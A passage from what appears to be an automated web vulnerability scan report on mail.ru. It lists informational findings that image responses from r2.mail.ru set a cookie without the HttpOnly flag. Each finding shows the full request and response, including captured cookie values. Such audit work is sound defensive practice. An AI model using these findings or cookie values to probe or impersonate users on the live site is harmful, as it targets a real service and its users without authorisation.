User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1374
Connection: keep-alive
Set-Cookie: p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...
17.154. http://r2.mail.ru/b12531624.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531624.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531624.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1811
Connection: keep-alive
Set-Cookie: p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...
17.155. http://r2.mail.ru/b12532203.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12532203.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12532203.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2157
Connection: keep-alive
Set-Cookie: p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
17.156. http://r2.mail.ru/b12752186.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752186.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752186.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 1841
Connection: keep-alive
Set-Cookie: p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
17.157. http://r2.mail.ru/b12752583.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752583.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752583.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 1772
Connection: keep-alive
Set-Cookie: p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
....................................<.<..................................    
.....................}........!1A..Qa."q.2....#B...R..$3br.    
.....
...[SNIP]...
17.158. http://r2.mail.ru/b12752584.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752584.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752584.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5872
Connection: keep-alive
Set-Cookie: p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...
17.159. http://r2.mail.ru/b12752585.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752585.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752585.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5320
Connection: keep-alive
Set-Cookie: p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...
17.160. http://r2.mail.ru/b12752586.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752586.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752586.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 4402
Connection: keep-alive
Set-Cookie: p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...
17.161. http://r2.mail.ru/b12855502.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12855502.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12855502.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 2692
Connection: keep-alive
Set-Cookie: p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
17.162. http://r2.mail.ru/b12887675.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887675.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887675.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3685
Connection: keep-alive
Set-Cookie: p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...
17.163. http://r2.mail.ru/b12887676.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887676.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887676.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3621
Connection: keep-alive
Set-Cookie: p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...
17.164. http://r2.mail.ru/b12887677.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887677.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887677.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:35 GMT
Content-Type: image/jpeg
Content-Length: 3066
Connection: keep-alive
Set-Cookie: p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:35 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...
17.165. http://r2.mail.ru/b12961140.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961140.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961140.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2105
Connection: keep-alive
Set-Cookie: p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...
17.166. http://r2.mail.ru/b12961154.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961154.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961154.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1321
Connection: keep-alive
Set-Cookie: p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...
17.167. http://r2.mail.ru/b12961373.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961373.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961373.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2341
Connection: keep-alive
Set-Cookie: p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................D.Z.."..............................
...[SNIP]...
17.168. http://r2.mail.ru/b12962356.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12962356.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12962356.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:29 GMT
Content-Type: image/jpeg
Content-Length: 2232
Connection: keep-alive
Set-Cookie: p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:29 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...
17.169. http://r2.mail.ru/b12963308.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12963308.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12963308.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1983
Connection: keep-alive
Set-Cookie: p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...
17.170. http://r2.mail.ru/b12965362.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12965362.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12965362.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
